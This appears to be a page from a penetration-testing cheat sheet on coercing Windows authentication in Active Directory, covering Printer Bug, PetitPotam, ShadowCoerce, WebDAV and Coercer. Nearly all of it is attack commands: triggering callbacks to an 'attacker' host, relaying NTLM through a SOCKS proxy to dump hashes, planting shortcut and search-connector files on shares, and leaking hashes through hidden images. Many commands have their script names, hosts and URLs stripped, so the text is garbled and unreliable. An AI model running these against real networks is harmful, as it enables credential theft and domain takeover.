Authentication Coercion

It's a good idea to check if NTLMv1 downgrade is possible when triggering the callbacks.

pageNTLMv1 Downgrade

Printer Bug (MS-RPRN)

Check if Spooler is running via Remote Registry:

$ MEGACORP/snovvcrash:'Passw0rd!'@ | grep -A2 -e MS-RPRN -e MS-PAR


Cmd > .\SpoolSample.exe
Cmd > .\SpoolSample.exe attacker@80/test.txt
Cmd > .\SpoolSample.exe attacker@SSL/test.txt

$ python -d megacorp.local -u snovvcrash -p 'Passw0rd!' DC01.megacorp.local
$ python -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@80/test.txt DC01.megacorp.local
$ python -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@SSL/test.txt DC01.megacorp.local

$ python megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local
$ python megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@80/test.txt
$ python megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@SSL/test.txt

PetitPotam (MS-EFSR)


$ python3 -d '' -u '' -p '' [-pipe all]
$ python3 -d '' -u '' -p '' attacker@80/test.txt
$ python3 -d '' -u '' -p '' attacker@SSL/test.txt
Cmd > .\PetitPotam.exe 1
Cmd > .\PetitPotam.exe attacker@80/test.txt 1
Cmd > .\PetitPotam.exe attacker@SSL/test.txt 1

PetitPotam any host (not only a DC with null sessions allowed for the IPC$ share) without initial creds via proxying through an authenticated session on behalf a DC-relayed machine account:

$ python3 -d '' -u '' -p ''
Something went wrong, check error status => SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

$ -ip -t -smb2support -socks --no-http-server --no-wcf-server --no-raw-server

$ python3 -d '' -u '' -p '' DC1.megacorp.local
ntlmrelayx> socks
ntlmrelayx> stopservers

$ sudo ./ -I eth0 -vA 
$ proxychains4 python3 -d MEGACORP -u 'DC1$' -no-pass

NTLM Relay DC1 to EXCH1 to get SOCKS ➡️ SOCKS proxy PetitPotam to EX1 as DC1$ ➡️ NTLM Relay to EXCH2 to dump hashes

With Kerberos authentication:

$ megacorp.local/snovvcrash -hashes e929e69f7c290222be87968263a9282e:e929e69f7c290222be87968263a9282e -dc-ip
$ KRB5CCNAME=`pwd`/snovvcrash.ccache python3 -k -no-pass -d megacorp.local -u snovvcrash target.megacorp.local attacker.megacorp.local



ShadowCoerce (MS-FSRVP)

$ python3 -d megacorp.local -u snovvcrash -p 'Passw0rd!'

WebDAV (WebClient)

Check if callback via WebDAV (HTTP) is possible. It is when the WebClient service is running. If it's possible, then NTLM Relay to LDAPS on behalf of the relayed machine account is your chance for RBCD workstation takeover.

Check via PowerShell:

PS > Install-Module -Name NtObjectManager
PS > Get-NtFile -Win32Path '\\\pipe\DAV RPC SERVICE'

Check via CME:

$ cme smb smb.txt -u snovvcrash -p 'Passw0rd!' -M webdav | grep -a 'WebClient Service enabled'

Check via GetWebDAVStatus:

PS > .\GetWebDAVStatus.exe SRV01,SRV02 --tc 1

Enable WebClient

Put the .searchConnector-ms file on a writable share. When a domain user opens target folder in explorer, the WebClient service should start automatically:

<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="">
    <description>Microsoft Outlook</description>



Leak with PowerShell:

PS > IWR -UseDefaultCredentials

Leak with Python:

import win32com.client
URL = ''
COM_OBJ = win32com.client.Dispatch('WinHTTP.WinHTTPRequest.5.1')
COM_OBJ.Open('GET', URL, False)

Leak with rpcping (catch with Responder's DCE-RPC listener):

Cmd > rpcping -s -e 135 -a privacy -u NTLM

Leak with a hidden image:

<img src="\\\pwn.ico" height="1" width="1" />

Leak with a shortcut:

$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("\\SRV01\PublicShare\pwn.lnk")
$lnk.IconLocation = "\\\pwn.ico"



$ coercer coerce -u snovvcrash -p 'Passw0rd!' -f dc.txt -l [--filter-pipe-name efsrpc] [--filter-method-name EfsRpcDuplicateEncryptionInfoFile] --auth-type smb --always-continue --delay 1

Last updated